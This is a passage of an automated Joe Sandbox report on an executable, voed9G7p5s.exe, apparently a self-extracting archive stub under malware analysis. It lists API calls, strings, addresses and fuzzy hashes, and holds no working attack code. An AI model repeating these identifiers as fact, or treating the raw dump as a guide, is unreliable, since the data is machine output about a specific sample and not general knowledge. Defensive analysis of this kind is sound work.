                                                                                                    • _free.LIBCMT ref: 00E2C97D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 776569668-0
                                                                                                    • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                                    • Instruction ID: a9be902c44ff4dd9274e1a59d483c16c503f3629d3a33e56d24692b1c580f07a
                                                                                                    • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                                    • Instruction Fuzzy Hash: 6A111F71581B24AAE528B7B1EC07FCF7BEC9F04B00F609C15F29D760A2DA65B5098B50
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00E1E669,00E1E5CC,00E1E86D), ref: 00E1E605
                                                                                                    • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00E1E61B
                                                                                                    • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00E1E630
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                    • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                    • API String ID: 667068680-1718035505
                                                                                                    • Opcode ID: af639583ce4e39bf19a3f8e2ddf72df6f532165c3d50961faee58d9bdba31a0d
                                                                                                    • Instruction ID: 9a5024385057652fe3c5d7c89fa7e11a9525539ab9fbb3f8945d621e4492307b
                                                                                                    • Opcode Fuzzy Hash: af639583ce4e39bf19a3f8e2ddf72df6f532165c3d50961faee58d9bdba31a0d
                                                                                                    • Instruction Fuzzy Hash: 09F0C2727802229F8B264F766C889EA66C96F257893443479FD05F3310EB50CCD89A90
                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 00E2891E
                                                                                                      • Part of subcall function 00E28DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00E2C896,?,00000000,?,00000000,?,00E2C8BD,?,00000007,?,?,00E2CCBA,?), ref: 00E28DE2
                                                                                                      • Part of subcall function 00E28DCC: GetLastError.KERNEL32(?,?,00E2C896,?,00000000,?,00000000,?,00E2C8BD,?,00000007,?,?,00E2CCBA,?,?), ref: 00E28DF4
                                                                                                    • _free.LIBCMT ref: 00E28930
                                                                                                    • _free.LIBCMT ref: 00E28943
                                                                                                    • _free.LIBCMT ref: 00E28954
                                                                                                    • _free.LIBCMT ref: 00E28965
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID: p
                                                                                                    • API String ID: 776569668-2678736219
                                                                                                    • Opcode ID: 087211a04c9b8e799836097e8b978d017e4666f1d1f3c10394069950e5903e48
                                                                                                    • Instruction ID: af36624578b68cc1361f5ba2ff41207e639dae01e3761f5c22c776479aa05e53
                                                                                                    • Opcode Fuzzy Hash: 087211a04c9b8e799836097e8b978d017e4666f1d1f3c10394069950e5903e48
                                                                                                    • Instruction Fuzzy Hash: C7F03A718129368F96066F16FE0240A3FE9F724764300290AF218B23B5CBB9495DDB81
                                                                                                    APIs
                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00E114C2
                                                                                                      • Part of subcall function 00E0B146: GetVersionExW.KERNEL32(?), ref: 00E0B16B
                                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00E114E6
                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00E11500
                                                                                                    • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00E11513
                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00E11523
                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00E11533
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Time$File$System$Local$SpecificVersion
                                                                                                    • String ID:
                                                                                                    • API String ID: 2092733347-0
                                                                                                    • Opcode ID: 0d222a9e0499f701ceb05f95ce36f7f687cf310fbacd0fdc9f8b756ccf05d105
                                                                                                    • Instruction ID: 1c49044548ca06d95bd55dbd7d888d8ce1fec0e4395f11d947d92ddbff8020c7
                                                                                                    • Opcode Fuzzy Hash: 0d222a9e0499f701ceb05f95ce36f7f687cf310fbacd0fdc9f8b756ccf05d105
                                                                                                    • Instruction Fuzzy Hash: 5631F77910834AAFC704DFA9C88499BBBE8FF98714F005A1EF995D3210E730D549CBA6
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(?,?,00E22AF1,00E202FC,00E1FA34), ref: 00E22B08
                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00E22B16
                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00E22B2F
                                                                                                    • SetLastError.KERNEL32(00000000,00E22AF1,00E202FC,00E1FA34), ref: 00E22B81
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                    • String ID:
                                                                                                    • API String ID: 3852720340-0
                                                                                                    • Opcode ID: ff700202347a9a1c257465d6066da5ea0623f6cc7a2f51f2a502b50c5b3539a5
                                                                                                    • Instruction ID: 1dba4cf7bfa3ecb36fb4383f01448f0937e9911ab7ff6e421b2db7a1db700a31
                                                                                                    • Opcode Fuzzy Hash: ff700202347a9a1c257465d6066da5ea0623f6cc7a2f51f2a502b50c5b3539a5
                                                                                                    • Instruction Fuzzy Hash: EC01F7321093397EEA242B767C89A672FD9EF11778760273EF210751E0EF554D049544
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(?,00E41098,00E24674,00E41098,?,?,00E240EF,?,?,00E41098), ref: 00E297E9
                                                                                                    • _free.LIBCMT ref: 00E2981C
                                                                                                    • _free.LIBCMT ref: 00E29844
                                                                                                    • SetLastError.KERNEL32(00000000,?,00E41098), ref: 00E29851
                                                                                                    • SetLastError.KERNEL32(00000000,?,00E41098), ref: 00E2985D
                                                                                                    • _abort.LIBCMT ref: 00E29863
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$_free$_abort
                                                                                                    • String ID:
                                                                                                    • API String ID: 3160817290-0
                                                                                                    • Opcode ID: 217453550db31307d0290b1ab448761b444695f27b77dcaac100da28a043c99f
                                                                                                    • Instruction ID: 529a74c31e009a5220074e209b304fcb9122b64e880a8b07cde1938a51fcb458
                                                                                                    • Opcode Fuzzy Hash: 217453550db31307d0290b1ab448761b444695f27b77dcaac100da28a043c99f
                                                                                                    • Instruction Fuzzy Hash: 90F0A9351406316BC61D33357D09F5B1EA99FD2775F293134F615B21D3EE20880A4555
                                                                                                    APIs
                                                                                                    • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00E1DC47
                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00E1DC61
                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E1DC72
                                                                                                    • TranslateMessage.USER32(?), ref: 00E1DC7C
                                                                                                    • DispatchMessageW.USER32(?), ref: 00E1DC86
                                                                                                    • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00E1DC91
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                                                                    • String ID:
                                                                                                    • API String ID: 2148572870-0
                                                                                                    • Opcode ID: 182f72bcdcb93e60a1f8d111c23c3f38a3145ad1c65a36b7fc261ad3dd56ad3d
                                                                                                    • Instruction ID: 587f12efab581145063f1861070b7db33d4386e85f69bf0bbf91040045ee215c
                                                                                                    • Opcode Fuzzy Hash: 182f72bcdcb93e60a1f8d111c23c3f38a3145ad1c65a36b7fc261ad3dd56ad3d
                                                                                                    • Instruction Fuzzy Hash: 76F0EC72A01219BBCB206BA6ED4CDDBBF6DEF42796B004411F50AF2051D675968ACBE0
                                                                                                    APIs
                                                                                                      • Part of subcall function 00E1A699: GetDC.USER32(00000000), ref: 00E1A69D
                                                                                                      • Part of subcall function 00E1A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E1A6A8
                                                                                                      • Part of subcall function 00E1A699: ReleaseDC.USER32(00000000,00000000), ref: 00E1A6B3
                                                                                                    • GetObjectW.GDI32(?,00000018,?), ref: 00E1A83C
                                                                                                      • Part of subcall function 00E1AAC9: GetDC.USER32(00000000), ref: 00E1AAD2
                                                                                                      • Part of subcall function 00E1AAC9: GetObjectW.GDI32(?,00000018,?), ref: 00E1AB01
                                                                                                      • Part of subcall function 00E1AAC9: ReleaseDC.USER32(00000000,?), ref: 00E1AB99
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ObjectRelease$CapsDevice
                                                                                                    • String ID: "$($A
                                                                                                    • API String ID: 1061551593-2217482528
                                                                                                    • Opcode ID: f15faec05421548c988db8381bfcea1f584c9151858dd76618cf7193db45f785
                                                                                                    • Instruction ID: 6be9832cefd117b4bf032a0320e47b8513f4f2a92cbe34d2873ede57fb147bd8
                                                                                                    • Opcode Fuzzy Hash: f15faec05421548c988db8381bfcea1f584c9151858dd76618cf7193db45f785
                                                                                                    • Instruction Fuzzy Hash: 3E910271204344AFD610DF25D848D6BBBE8FFC8710F04592EF99AE3221DB71A949CB62
                                                                                                    APIs
                                                                                                      • Part of subcall function 00E105DA: _wcslen.LIBCMT ref: 00E105E0
                                                                                                      • Part of subcall function 00E0B92D: _wcsrchr.LIBVCRUNTIME ref: 00E0B944
                                                                                                    • _wcslen.LIBCMT ref: 00E0C197
                                                                                                    • _wcslen.LIBCMT ref: 00E0C1DF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$_wcsrchr
                                                                                                    • String ID: .exe$.rar$.sfx
                                                                                                    • API String ID: 3513545583-31770016
                                                                                                    • Opcode ID: 401e911393677c82a9fedcba04c69ca2dd2a41e937d4eef0269081c11f5154eb
                                                                                                    • Instruction ID: 527597b7c387a9ceea0a92526aece777fb11ffda11a5057013304bae202213bc
                                                                                                    • Opcode Fuzzy Hash: 401e911393677c82a9fedcba04c69ca2dd2a41e937d4eef0269081c11f5154eb
                                                                                                    • Instruction Fuzzy Hash: 4B41F232501311A5C632AF749846ABBB3B8EF54708F347A4EF9817B5C2EBA04DC2C391
                                                                                                    APIs
                                                                                                    • _wcslen.LIBCMT ref: 00E0BB27
                                                                                                    • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,00E0A275,?,?,00000800,?,00E0A23A,?,00E0755C), ref: 00E0BBC5
                                                                                                    • _wcslen.LIBCMT ref: 00E0BC3B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$CurrentDirectory
                                                                                                    • String ID: UNC$\\?\
                                                                                                    • API String ID: 3341907918-253988292
                                                                                                    • Opcode ID: 10b511db4b468861db0bd54a89ff2145a55681599ca63a45e802be562e8e525e
                                                                                                    • Instruction ID: 91ad9664260bef969ae0e9ef325764e471471c8ad5c55fe1574e5e4cf07de9c1
                                                                                                    • Opcode Fuzzy Hash: 10b511db4b468861db0bd54a89ff2145a55681599ca63a45e802be562e8e525e
                                                                                                    • Instruction Fuzzy Hash: 4141A031440216A6EF21AF20CC85EEEB7A9BF41394F156565F854B3291EBB4DED0CB60
                                                                                                    APIs
                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\voed9G7p5s.exe,00000104), ref: 00E27FAE
                                                                                                    • _free.LIBCMT ref: 00E28079
                                                                                                    • _free.LIBCMT ref: 00E28083
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$FileModuleName
                                                                                                    • String ID: C:\Users\user\Desktop\voed9G7p5s.exe$`%Z
                                                                                                    • API String ID: 2506810119-394931287
                                                                                                    • Opcode ID: ea0f2c1db56c218b57286718a7f7922cf8ad8ad9613294cb885d15afb81015e4
                                                                                                    • Instruction ID: 59a464658db81ccbb5decd4f48fa7c371af24c2e92c34981214a2fd83e56f10b
                                                                                                    • Opcode Fuzzy Hash: ea0f2c1db56c218b57286718a7f7922cf8ad8ad9613294cb885d15afb81015e4
                                                                                                    • Instruction Fuzzy Hash: 9031B171A05228AFEB21DF95F980D9EBBFCEF95350F10506AF904B7211DAB08E48CB51
                                                                                                    APIs
                                                                                                    • _wcschr.LIBVCRUNTIME ref: 00E1CD84
                                                                                                      • Part of subcall function 00E1AF98: _wcschr.LIBVCRUNTIME ref: 00E1B033
                                                                                                      • Part of subcall function 00E11FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00E0C116,00000000,.exe,?,?,00000800,?,?,?,00E18E3C), ref: 00E11FD1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcschr$CompareString
                                                                                                    • String ID: <$HIDE$MAX$MIN
                                                                                                    • API String ID: 69343711-3358265660
                                                                                                    • Opcode ID: c62da306e98a7c3d1d258c4ca7ecfd3b62c31cca92cdf3bfb62a08b96be31eb3
                                                                                                    • Instruction ID: 9335d047d039aacbbbb92c48c508caed3b342cd855f79abab80eadcdfe70e879
                                                                                                    • Opcode Fuzzy Hash: c62da306e98a7c3d1d258c4ca7ecfd3b62c31cca92cdf3bfb62a08b96be31eb3
                                                                                                    • Instruction Fuzzy Hash: B5317E72A40619AADF25CB60DC45BEE73BCEB15354F5091A6E901F7180EBB09AC48FA1
                                                                                                    APIs
                                                                                                    • GetDC.USER32(00000000), ref: 00E1AAD2
                                                                                                    • GetObjectW.GDI32(?,00000018,?), ref: 00E1AB01
                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 00E1AB99
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ObjectRelease
                                                                                                    • String ID: -$7
                                                                                                    • API String ID: 1429681911-474858286
                                                                                                    • Opcode ID: 9672f0597d25346b435a40f2a9986aea188acd291181d7bf9889a4315d0ef6a9
                                                                                                    • Instruction ID: f6d265c897618d98e16455ce0cd6913cf8843a858f90bb888a2b74adf7608a74
                                                                                                    • Opcode Fuzzy Hash: 9672f0597d25346b435a40f2a9986aea188acd291181d7bf9889a4315d0ef6a9
                                                                                                    • Instruction Fuzzy Hash: 32214C72108304BFD3409FA6EC48E6FBFE9FB89395F040919FA45A2121D7719A5C9B62
                                                                                                    APIs
                                                                                                    • _swprintf.LIBCMT ref: 00E0B9B8
                                                                                                      • Part of subcall function 00E04092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E040A5
                                                                                                    • _wcschr.LIBVCRUNTIME ref: 00E0B9D6
                                                                                                    • _wcschr.LIBVCRUNTIME ref: 00E0B9E6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcschr$__vswprintf_c_l_swprintf
                                                                                                    • String ID: %c:\
                                                                                                    • API String ID: 525462905-3142399695
                                                                                                    • Opcode ID: f818a205b4f0ddf1966b9b1c4f4e8250576f0f00db08c64427537fcb5132567b
                                                                                                    • Instruction ID: 69b1cc968a9d949c118038e4eb404c99a4aaf8eaab856ce1ec5e5fef7f41f37c
                                                                                                    • Opcode Fuzzy Hash: f818a205b4f0ddf1966b9b1c4f4e8250576f0f00db08c64427537fcb5132567b
                                                                                                    • Instruction Fuzzy Hash: 6B01F963600312B5DA306B359C85D6BA7ECFE95770B406D0EF544F60C2EB24D884C2B1
                                                                                                    APIs
                                                                                                      • Part of subcall function 00E01316: GetDlgItem.USER32(00000000,00003021), ref: 00E0135A
                                                                                                      • Part of subcall function 00E01316: SetWindowTextW.USER32(00000000,00E335F4), ref: 00E01370
                                                                                                    • EndDialog.USER32(?,00000001), ref: 00E1B2BE
                                                                                                    • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00E1B2D6
                                                                                                    • SetDlgItemTextW.USER32(?,00000067,?), ref: 00E1B304
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ItemText$DialogWindow
                                                                                                    • String ID: GETPASSWORD1$xz
                                                                                                    • API String ID: 445417207-3234807970
                                                                                                    • Opcode ID: 4db4b98231206c1d706d0e9184ea9e7a775162a486261100c84af0e3478dd413
                                                                                                    • Instruction ID: cdcc6da63053048e732f03d07476ffd407424935daafa9b7d7ed72be4c1cf1ff
                                                                                                    • Opcode Fuzzy Hash: 4db4b98231206c1d706d0e9184ea9e7a775162a486261100c84af0e3478dd413
                                                                                                    • Instruction Fuzzy Hash: 7211C432900118BADB219A74AD4AFFF376CEF5A754F001020FA45F61D0C7B5AA999761
                                                                                                    APIs
                                                                                                    • LoadBitmapW.USER32(00000065), ref: 00E1B6ED
                                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 00E1B712
                                                                                                    • DeleteObject.GDI32(00000000), ref: 00E1B744
                                                                                                    • DeleteObject.GDI32(00000000), ref: 00E1B767
                                                                                                      • Part of subcall function 00E1A6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00E1B73D,00000066), ref: 00E1A6D5
                                                                                                      • Part of subcall function 00E1A6C2: SizeofResource.KERNEL32(00000000,?,?,?,00E1B73D,00000066), ref: 00E1A6EC
                                                                                                      • Part of subcall function 00E1A6C2: LoadResource.KERNEL32(00000000,?,?,?,00E1B73D,00000066), ref: 00E1A703
                                                                                                      • Part of subcall function 00E1A6C2: LockResource.KERNEL32(00000000,?,?,?,00E1B73D,00000066), ref: 00E1A712
                                                                                                      • Part of subcall function 00E1A6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00E1B73D,00000066), ref: 00E1A72D
                                                                                                      • Part of subcall function 00E1A6C2: GlobalLock.KERNEL32(00000000), ref: 00E1A73E
                                                                                                      • Part of subcall function 00E1A6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00E1A762
                                                                                                      • Part of subcall function 00E1A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00E1A7A7
                                                                                                      • Part of subcall function 00E1A6C2: GlobalUnlock.KERNEL32(00000000), ref: 00E1A7C6
                                                                                                      • Part of subcall function 00E1A6C2: GlobalFree.KERNEL32(00000000), ref: 00E1A7CD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                                                                    • String ID: ]
                                                                                                    • API String ID: 1797374341-3352871620
                                                                                                    • Opcode ID: 0c4ab8d79b363746b7011f6ddf3b61629abdd2862b5077dac925fac1a2978801
                                                                                                    • Instruction ID: 7d91030ed2e5cf494ed97fd85b406adf69461d44a25c8a02691df8ad05d2a4f3
                                                                                                    • Opcode Fuzzy Hash: 0c4ab8d79b363746b7011f6ddf3b61629abdd2862b5077dac925fac1a2978801
                                                                                                    • Instruction Fuzzy Hash: 7801D6369412016BC71277749D09AFF7AFA9FC17A6F081121F900B72D6DF718D8D4261
                                                                                                    APIs
                                                                                                      • Part of subcall function 00E01316: GetDlgItem.USER32(00000000,00003021), ref: 00E0135A
                                                                                                      • Part of subcall function 00E01316: SetWindowTextW.USER32(00000000,00E335F4), ref: 00E01370
                                                                                                    • EndDialog.USER32(?,00000001), ref: 00E1D64B
                                                                                                    • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00E1D661
                                                                                                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 00E1D675
                                                                                                    • SetDlgItemTextW.USER32(?,00000068), ref: 00E1D684
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ItemText$DialogWindow
                                                                                                    • String ID: RENAMEDLG
                                                                                                    • API String ID: 445417207-3299779563
                                                                                                    • Opcode ID: dd56221975e3fe8bb789772147bdec15be41ab14b714b8642a2ec02c8b3bf55d
                                                                                                    • Instruction ID: 81ae2f3aa5c5fc5d8488b5efe10b2daf721df8f2c9dd3996ee67a8cf99effa4c
                                                                                                    • Opcode Fuzzy Hash: dd56221975e3fe8bb789772147bdec15be41ab14b714b8642a2ec02c8b3bf55d
                                                                                                    • Instruction Fuzzy Hash: C1012833249310BED2114F75AD09FDB7B5CEB5AB42F110410F305B20D0C7A2998C8B79
                                                                                                    APIs
                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00E27E24,?,?,00E27DC4,?,00E3C300,0000000C,00E27F1B,?,00000002), ref: 00E27E93
                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00E27EA6
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,00E27E24,?,?,00E27DC4,?,00E3C300,0000000C,00E27F1B,?,00000002,00000000), ref: 00E27EC9
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                    • Opcode ID: 288d582c9e4a31451faf2ded77004d2e83c50d1dbb5e7ca72f06f3437339ca97
                                                                                                    • Instruction ID: e625ea2bd7124cad1756ae2dc4b6bf70865b3200da03b1de70349dbf389f0eff
                                                                                                    • Opcode Fuzzy Hash: 288d582c9e4a31451faf2ded77004d2e83c50d1dbb5e7ca72f06f3437339ca97
                                                                                                    • Instruction Fuzzy Hash: 8FF03C31A0421CBFCB159BA5EC0DBAEBFB5EB44715F0180A9F805B2260DB759E44CAA0
                                                                                                    APIs
                                                                                                      • Part of subcall function 00E1081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00E10836
                                                                                                      • Part of subcall function 00E1081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00E0F2D8,Crypt32.dll,00000000,00E0F35C,?,?,00E0F33E,?,?,?), ref: 00E10858
                                                                                                    • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00E0F2E4
                                                                                                    • GetProcAddress.KERNEL32(00E481C8,CryptUnprotectMemory), ref: 00E0F2F4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                                    • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                                    • API String ID: 2141747552-1753850145
                                                                                                    • Opcode ID: e3db9b6119b0eeb642ba5b3e191076da74f5e1f323a96bd9a3f6b62759bc327b
                                                                                                    • Instruction ID: 6d8d20dedbfe1e4f066da477577be421b38fbdc906e8da6606301083a00e90be
                                                                                                    • Opcode Fuzzy Hash: e3db9b6119b0eeb642ba5b3e191076da74f5e1f323a96bd9a3f6b62759bc327b
                                                                                                    • Instruction Fuzzy Hash: 2BE04670910746AECB309B79994DF42BED56F04714F14A82DE0DAF3AA0DAB9D5C4CB50
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
